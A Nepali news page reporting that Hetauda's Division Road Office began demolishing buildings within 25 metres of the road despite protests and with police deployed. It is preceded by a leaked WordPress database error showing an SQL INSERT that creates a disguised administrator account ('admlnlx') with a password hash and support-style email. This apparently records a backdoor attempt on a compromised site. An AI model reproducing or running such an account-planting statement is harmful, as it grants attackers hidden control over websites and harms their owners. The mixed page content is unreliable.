WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLSRzFZWo37l.v/9s5Q7Ug5ANr0.gl/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 15:42:11', '', 'admlnlx', 'admlnlx')
हेटौंडा,माघ ४-
स्थानीय वासिन्दाको विरोधका बाबजुद डिभिजन सडक कार्यालयले हेटौंडा बजारमा सडक छेउछाउका घर टहराहरु भत्काउन सुरु गरेको छ। हेटौंडा बजारमा सडकको दायाबाया २५ मिटर क्षेत्रभित्रको घर टहरा भत्काउन मंगलबार बिहानदेखि सुरु गरेको हो।
मकवानपुर उद्योग वाणिज्य संघ, बसोबास संरक्षण समिति तथा मकवानपुरबाट प्रतिनिधित्व गर्ने राज्यमन्त्रीदेखि सांसदसम्मले घर भत्काउन नहुने बताएपनि सडक डिभिजन कार्यालय हेटौँडाले सडक क्षेत्रका घर भत्काउन थालेको हो। मंगलबार बिहान ८ बजे हेटौंडाको राप्तिखोला परिसरबाट सडक फराकिलो पार्ने कामको थालनी भएको छ। सडक फराकिलो पार्ने काम सुरु भएपछि मकवानपुर उद्योग वाणिज्य संघको नेत्तृत्वमा प्रदर्शन समेत भएको थियो। स्थानीय प्रशासनले ठूलो संख्यामा प्रहरी परिचालन गरेर डोजर चलाएको छ।